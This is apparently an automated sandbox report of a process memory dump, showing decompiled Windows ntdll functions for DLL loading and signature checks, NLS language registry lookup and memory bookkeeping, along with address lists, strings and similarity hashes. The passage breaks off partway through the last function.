0x018787a3
0x018787a8
0x018787c3
0x018787c3
0x018787c8
0x018787d1
0x018787d4
0x018787d8
0x018787e5
0x018787ec
0x018c9bfe
0x018c9c00
0x018c9c02
0x018c9c08
0x018c9c0d
0x018c9c0f
0x018c9c14
0x018c9c2d
0x018c9c32
0x018c9c37
0x018c9c3a
0x018c9c3c
0x018c9c42
0x018c9c42
0x018c9c3c
0x018c9c02
0x018787da
0x018787df
0x018787e3
0x00000000
0x00000000
0x018787e3
0x018787f2
0x00000000
0x018787fb
0x018787fd
0x018787fe
0x0187880e
0x0187880f
0x01878810
0x01878814
0x0187881a
0x0187881c
0x0187881f
0x01878821
0x01878822
0x01878824
0x01878826
0x0187882c
0x0187882e
0x018c9c48
0x018c9c48
0x01878834
0x01878834
0x01878837
0x00000000
0x00000000
0x01878837
0x0187882e
0x0187883d
0x01878840
0x01878843
0x01878846
0x01878849
0x0187884c
0x0187884e
0x01878850
0x01878852
0x01878854
0x01878857
0x018788b4
0x018788b6
0x018788b6
0x01878859
0x01878859
0x01878859
0x01878861
0x01878866
0x0187886a
0x0187893d
0x01878941
0x00000000
0x01878947
0x01878947
0x0187894a
0x0187894c
0x00000000
0x01878952
0x01878955
0x0187895a
0x0187895d
0x0187895d
0x0187895f
0x01878961
0x01878961
0x01878968
0x00000000
0x00000000
0x0187896a
0x0187896b
0x0187896e
0x00000000
0x01878970
0x01878970
0x01878970
0x01878970
0x01878972
0x01878972
0x01878974
0x00000000
0x0187897a
0x0187897a
0x0187897d
0x00000000
0x01878983
0x018c9c65
0x018c9c6d
0x018c9c72
0x018c9c75
0x018c9c75
0x018c9c82
0x018c9c86
0x018c9c87
0x018c9c88
0x018c9c89
0x018c9c8c
0x018c9c90
0x018c9c95
0x018c9c97
0x018c9ca0
0x018c9ca3
0x018c9ca9
0x018c9ca9
0x00000000
0x018c9ca9
0x018c9ca3
0x00000000
0x018c9c97
0x0187897d
0x00000000
0x01878974
0x01878988
0x01878992
0x01878996
0x00000000
0x01878996
0x0187894c
0x00000000
0x01878870
0x0187887b
0x0187887d
0x0187887f
0x01878881
0x01878884
0x01878884
0x01878886
0x01878889
0x0187888c
0x0187888e
0x01878891
0x01878891
0x01878898
0x00000000
0x00000000
0x0187889a
0x0187889b
0x0187889e
0x00000000
0x00000000
0x018788a0
0x018788a8
0x018788b0
0x018788b2
0x018788d3
0x018788d5
0x00000000
0x018788d7
0x018788db
0x018788dc
0x018788e0
0x018788e8
0x018788ee
0x018788f0
0x018788f3
0x018788fc
0x01878901
0x01878906
0x0187890c
0x0187890c
0x0187890f
0x01878916
0x01878917
0x01878918
0x01878919
0x0187891a
0x0187891f
0x01878921
0x018c9c52
0x018c9c55
0x018c9c5b
0x018c9cac
0x018c9cc0
0x018c9cc0
0x018c9c55
0x01878927
0x01878927
0x0187892f
0x01878933
0x00000000
0x018788f5
0x018788f5
0x00000000
0x018788f7
0x018788f7
0x018788fa
0x00000000
0x00000000
0x00000000
0x00000000
0x018788fa
0x018788f5
0x018788f3
0x00000000
0x018788d5
0x00000000
0x018788b2
0x018788c9
0x00000000
0x018788c9
0x0187887f
0x0187886a
0x01878857
0x01878852
0x018788bf
0x018788bf
0x018787aa
0x018787ad
0x018787ae
0x018787b4
0x018787b5
0x018787b6
0x018787b8
0x018787bd
0x018787c1
0x018787f4
0x018787fa
0x00000000
0x00000000
0x00000000
0x018787c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018C9C18
minkernel\ntdll\ldrsnap.c, xrefs: 018C9C28
LdrpDoPostSnapWork, xrefs: 018C9C1E

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 25d0adbdcc6b0ecac9e83a4931384f3c8bb29c619ad00f70a59d157805b8413b
Instruction ID: 7d68d421f1f327f78d27d4729f214bdd3dd9f1c589bdff7fde4ad6c07717b416
Opcode Fuzzy Hash: 25d0adbdcc6b0ecac9e83a4931384f3c8bb29c619ad00f70a59d157805b8413b
Instruction Fuzzy Hash: 96910471A0021ADFEF18DF5DD488ABABBB5FF46318B1541A9D905EB241DB30EB01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01877E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01877E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0187CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0186C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1955780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E018E5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1955780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01887D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01887D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E018E7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01887D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01887D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E018E7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0189A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0186B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01877e4c
0x01877e50
0x01877e55
0x01877e58
0x01877e5d
0x01877e71
0x01877f33
0x01877e77
0x01877e77
0x01877e79
0x01877e79
0x01877e7e
0x01877f45
0x018c9848
0x00000000
0x018c9848
0x01877f4e
0x01877f53
0x01877f5a
0x00000000
0x00000000
0x018c985a
0x018c9862
0x018c9866
0x00000000
0x018c986c
0x00000000
0x018c986c
0x01877e84
0x01877e84
0x01877e8d
0x018c9871
0x01877eb8
0x01877ec0
0x01877ec0
0x01877e9a
0x018c987e
0x00000000
0x00000000
0x018c9884
0x018c988b
0x018c98a7
0x018c98ac
0x018c98b1
0x018c98b6
0x018c98b8
0x018c98b8
0x018c98b9
0x00000000
0x018c98b9
0x01877ea0
0x01877ea7
0x00000000
0x00000000
0x01877eac
0x01877eb1
0x01877ec6
0x01877ed0
0x018c98cc
0x01877ed6
0x01877ed6
0x01877ed6
0x01877ede
0x01877ee3
0x018c98e3
0x018c98f0
0x018c9902
0x018c98f2
0x018c98fb
0x018c98fb
0x018c9907
0x018c991d
0x018c991d
0x018c9907
0x018c98e3
0x01877ef0
0x01877f14
0x01877f14
0x01877f1e
0x018c9946
0x01877f24
0x01877f24
0x01877f24
0x01877f2c
0x018c996a
0x018c9975
0x018c9975
0x018c997e
0x018c9993
0x018c9993
0x018c997e
0x00000000
0x01877ef2
0x01877efc
0x01877f0a
0x01877f0e
0x018c9933
0x00000000
0x018c9933
0x00000000
0x01877f0e
0x00000000
0x00000000
0x00000000
0x01877eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 018C98A2
LdrpCompleteMapModule, xrefs: 018C9898
Could not validate the crypto signature for DLL %wZ, xrefs: 018C9891

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 8ff08272bcde6de46e770693a253d977ccc690553808d6ca253f43c17908908d
Instruction ID: 0b01b7a9335f1992e58f6aec2ced9779b332a4644a246c0149fbc0b59b36d582
Opcode Fuzzy Hash: 8ff08272bcde6de46e770693a253d977ccc690553808d6ca253f43c17908908d
Instruction Fuzzy Hash: 8551D332A04745DBE721CB6CC948B6A7BE4EB01B18F1409A9EA51DB7E2D774EF00C751

Uniqueness

Uniqueness Score: -1.00%

Function 0186E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0186E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0186F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E018A95D0();
						}
						if(_t78 != 0) {
							L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E018AFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E018ABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E018A9600();
					if(_t97 < 0) {
						goto L6;
					}
					E018ABB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0186F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E018ABB40(_t83, _t102 + 0x24, _t78);
								if(L018743C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E018ABB40(_t84, _t102 + 0x24, _t94);
									if(L018743C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0186e620
0x0186e628
0x0186e62f
0x0186e631
0x0186e635
0x0186e637
0x0186e63e
0x018c5503
0x018c5503
0x0186e64c
0x0186e64c
0x0186e651
0x00000000
0x00000000
0x0186e661
0x0186e665
0x018c542a
0x0186e715
0x0186e71a
0x0186e71c
0x0186e720
0x0186e720
0x0186e727
0x0186e736
0x0186e736
0x0186e743
0x0186e743
0x0186e673
0x0186e678
0x0186e67d
0x0186e682
0x0186e685
0x0186e692
0x0186e69b
0x0186e6a3
0x0186e6ad
0x0186e6b1
0x0186e6b2
0x0186e6bb
0x0186e6bf
0x0186e6c0
0x0186e6c8
0x0186e6cc
0x0186e6d5
0x0186e6d9
0x00000000
0x00000000
0x0186e6e5
0x0186e6ea
0x0186e6f9
0x0186e70b
0x0186e70f
0x018c5439
0x018c545e
0x018c545e
0x00000000
0x018c545e
0x018c543b
0x018c543e
0x018c5440
0x018c5445
0x018c5472
0x018c5475
0x018c548d
0x018c5493
0x018c54a9
0x00000000
0x00000000
0x018c54ab
0x018c54b4
0x018c54bc
0x018c54c8
0x018c54de
0x018c54fb
0x018c54e0
0x018c54e6
0x018c54eb
0x018c54eb
0x018c54de
0x00000000
0x018c54bc
0x018c5477
0x018c547a
0x018c5480
0x018c5483
0x018c5486
0x018c548b
0x00000000
0x00000000
0x00000000
0x018c548b
0x00000000
0x00000000
0x00000000
0x00000000
0x018c5447
0x018c5447
0x018c5447
0x018c5447
0x018c544e
0x00000000
0x00000000
0x018c5450
0x018c5452
0x018c5455
0x018c545a
0x00000000
0x00000000
0x00000000
0x018c545c
0x018c546a
0x018c546d
0x018c546f
0x00000000
0x018c546f
0x0186e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0186E68C
@, xrefs: 0186E6C0
InstallLanguageFallback, xrefs: 0186E6DB

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 7996c4d48074f19f0ded4569ea0c21a4072e094e167ffab9a6afe836c5e0a84c
Instruction ID: 9ca40d8efa9d0fe3b0af2634b2fadb32a10aba563532e8900470aacb4ceb675d
Opcode Fuzzy Hash: 7996c4d48074f19f0ded4569ea0c21a4072e094e167ffab9a6afe836c5e0a84c
Instruction Fuzzy Hash: C151A6B56083469BDB14DF68D480AABB7E8BF98B14F45092EF985D7240F734EB04C792

Uniqueness

Uniqueness Score: -1.00%

Function 0192E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0192E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0192BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0192BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0192AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E018A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0192A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0192A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E018A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0192A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0192A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01882280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0187B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0187FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01887D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0191FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0192e547
0x0192e549
0x0192e54f
0x0192e553
0x0192e557
0x0192e55a
0x0192e55c
0x0192e55f
0x0192e561
0x0192e567
0x0192e56b
0x0192e7e2
0x00000000
0x0192e571
0x0192e575
0x0192e577
0x0192e57b
0x0192e57c
0x0192e57d
0x0192e57e
0x0192e57f
0x0192e588
0x0192e58f
0x0192e591
0x0192e592
0x0192e592
0x0192e596
0x0192e59e
0x0192e5a0
0x0192e5a6
0x0192e61d
0x0192e61d
0x0192e621
0x0192e623
0x0192e630
0x0192e630
0x0192e7e6
0x0192e7eb
0x0192e7ed
0x0192e7f4
0x0192e7fa
0x0192e7ff
0x0192e7ff
0x0192e80a
0x0192e812
0x0192e812
0x0192e5ab
0x0192e5b4
0x0192e5b9
0x0192e5be
0x0192e5c0
0x0192e5c2
0x0192e5c8
0x0192e5c9
0x0192e5cb
0x0192e5cc
0x0192e5d5
0x0192e5e4
0x0192e5f1
0x0192e5f8
0x0192e5f8
0x0192e5d5
0x0192e602
0x0192e616
0x0192e63d
0x0192e644
0x0192e64d
0x0192e652
0x0192e657
0x0192e659
0x0192e65b
0x0192e661
0x0192e662
0x0192e664
0x0192e665
0x0192e66e
0x0192e67d
0x0192e68a
0x0192e691
0x0192e691
0x0192e66e
0x0192e6b0
0x00000000
0x0192e6b6
0x0192e6bd
0x0192e6c7
0x0192e6d7
0x0192e6d9
0x0192e6db
0x0192e6de
0x0192e6e3
0x0192e6f3
0x0192e6fc
0x0192e700
0x0192e700
0x0192e704
0x0192e70a
0x0192e70a
0x0192e713
0x0192e716
0x0192e719
0x0192e720
0x0192e761
0x0192e76b
0x0192e774
0x0192e77a
0x0192e77a
0x0192e78a
0x0192e791
0x0192e799
0x0192e79b
0x0192e79f
0x0192e7aa
0x0192e7c0
0x0192e7ac
0x0192e7b2
0x0192e7b9
0x0192e7b9
0x0192e7c7
0x0192e806
0x00000000
0x0192e7c9
0x0192e7d1
0x0192e7d8
0x00000000
0x0192e7d8
0x00000000
0x00000000
0x0192e722
0x0192e72e
0x0192e748
0x0192e74c
0x0192e754
0x0192e756
0x0192e75c
0x0192e75c
0x00000000
0x0192e75c
0x0192e758
0x0192e758
0x00000000
0x0192e758
0x0192e750
0x00000000
0x00000000
0x0192e752
0x00000000
0x0192e752
0x0192e730
0x0192e735
0x0192e73d
0x0192e73f
0x00000000
0x00000000
0x0192e741
0x0192e741
0x00000000
0x0192e741
0x0192e739
0x00000000
0x00000000
0x0192e73b
0x00000000
0x0192e73b
0x0192e722
0x0192e720
0x0192e6b0
0x0192e618
0x00000000
0x0192e618

Strings

`, xrefs: 0192E5D7
`, xrefs: 0192E670

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: ae09847a051a0eb25cb82762e79178eae76d4fe7cb1f48ea7a747cd0fdd016f7
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: DB9182316043529FE725CE29C881B1BBBE9BFC4715F14892DFA99CB284E774E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 018E51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E018E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x19405f0);
				E018BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0187EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E018E53CA(0);
						return E018BD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E018AF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01883690(1, _t117, 0x1841810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E018AAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01884620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E018AAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
